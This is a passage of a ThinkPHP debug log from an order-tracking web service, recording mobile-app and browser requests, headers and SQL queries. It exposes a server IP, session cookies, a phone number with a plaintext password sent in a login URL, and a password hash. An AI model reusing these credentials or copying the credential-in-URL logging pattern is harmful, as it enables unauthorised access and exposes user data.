AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,sum(kucun*price) as total FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 1 [ RunTime:0.002875s ] --------------------------------------------------------------- [ 2025-12-14T16:35:43+08:00 ] 106.112.204.117 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020927s][吞吐率:47.78req/s] [内存消耗:2,228.34kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001240s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'image/webp,image/*,*/*;q=0.8', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=sh24u5m97mn22og8ehb2h8q7c5', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:36:35+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021132s][吞吐率:47.32req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001257s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:36:36+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019223s][吞吐率:52.02req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001110s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:36:36+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020151s][吞吐率:49.62req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001219s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:36:41+08:00 ] 39.144.91.198 POST /api/users/getStaffinfo?staff_id=24 [ info ] 47.105.33.115:8081/api/users/getStaffinfo?staff_id=24 [运行时间:0.040832s][吞吐率:24.49req/s] [内存消耗:4,484.93kb] [文件加载:74] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001224s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getStaffinfo', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001640s ] [ info ] [ RUN ] app\api\controller\Users->getStaffinfo[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000524s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000918s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000655s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000439s ] --------------------------------------------------------------- [ 2025-12-14T16:36:54+08:00 ] 39.144.91.198 POST /api/users/login?phone=13932758571&password=syp123456 [ info ] 47.105.33.115:8081/api/users/login?phone=13932758571&password=syp123456 [运行时间:0.037826s][吞吐率:26.44req/s] [内存消耗:4,306.94kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001188s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'phone' => '13932758571', 'password' => 'syp123456', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001599s ] [ info ] [ RUN ] app\api\controller\Users->login[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'path' => '/alidata/www/gendan/runtime/temp/', 'expire' => 2592000, ) [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000509s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000781s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `phone_num` = '13932758571' LIMIT 1 [ RunTime:0.000354s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `phone_num` = '13932758571' AND `accout_pwd` = '7b0984d22c2b0a9a9487d1f6d5061d96' LIMIT 1 [ RunTime:0.000406s ] --------------------------------------------------------------- [ 2025-12-14T16:36:54+08:00 ] 39.144.91.198 POST /api/users/getStaffinfo?staff_id=19 [ info ] 47.105.33.115:8081/api/users/getStaffinfo?staff_id=19 [运行时间:0.042296s][吞吐率:23.64req/s] [内存消耗:4,485.03kb] [文件加载:74] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001209s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getStaffinfo', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '19', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001565s ] [ info ] [ RUN ] app\api\controller\Users->getStaffinfo[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.004063s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000859s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000834s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '19' LIMIT 1 [ RunTime:0.000509s ] --------------------------------------------------------------- [ 2025-12-14T16:36:54+08:00 ] 39.144.91.198 POST /api/office/officeorder/getNewestOrder?userId=19&shenhe=1 [ info ] 47.105.33.115:8081/api/office/officeorder/getNewestOrder?userId=19&shenhe=1 [运行时间:0.084810s][吞吐率:11.79req/s] [内存消耗:4,831.45kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.005688s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getNewestOrder', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'shenhe' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001819s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getNewestOrder[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000367s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000839s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000339s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001043s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000877s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND `orderinfo`.`pid` = 0 AND ( order_status in ("1","2") ) ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.022545s ] --------------------------------------------------------------- [ 2025-12-14T16:36:54+08:00 ] 39.144.91.198 POST /api/office/officeorder/getorderlist?userId=19&keywords=&shenhe=1&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=19&keywords=&shenhe=1&offset=0&pageNum=10 [运行时间:0.103226s][吞吐率:9.69req/s] [内存消耗:4,914.45kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000031s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001125s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'keywords' => '', 'shenhe' => '1', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001612s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000336s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000837s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000425s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001275s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000689s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1765701414>orderinfo.end_time desc,1765701414>orderinfo.end_time desc,1765701414-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.025600s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001321s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000396s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000258s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000238s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000243s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000288s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000332s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000381s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000279s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000237s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000241s ] --------------------------------------------------------------- [ 2025-12-14T16:36:54+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018641s][吞吐率:53.65req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001099s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:36:56+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019262s][吞吐率:51.92req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001123s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:36:59+08:00 ] 39.144.91.198 POST /api/users/getStaffs?staff_id=19 [ info ] 47.105.33.115:8081/api/users/getStaffs?staff_id=19 [运行时间:0.038094s][吞吐率:26.25req/s] [内存消耗:4,304.81kb] [文件加载:70] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001150s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getStaffs', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '19', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001566s ] [ info ] [ RUN ] app\api\controller\Users->getStaffs[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000394s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000965s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000367s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `factorymge_id` = 26 AND `staff_status` = '1' AND ( jobmge_id in (2) ) [ RunTime:0.000406s ] --------------------------------------------------------------- [ 2025-12-14T16:36:59+08:00 ] 39.144.91.198 POST /api/users/getCaigouStaffs?userId=19 [ info ] 47.105.33.115:8081/api/users/getCaigouStaffs?userId=19 [运行时间:0.038569s][吞吐率:25.93req/s] [内存消耗:4,477.21kb] [文件加载:74] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001132s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getCaigouStaffs', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001502s ] [ info ] [ RUN ] app\api\controller\Users->getCaigouStaffs[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000654s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000909s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000695s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS 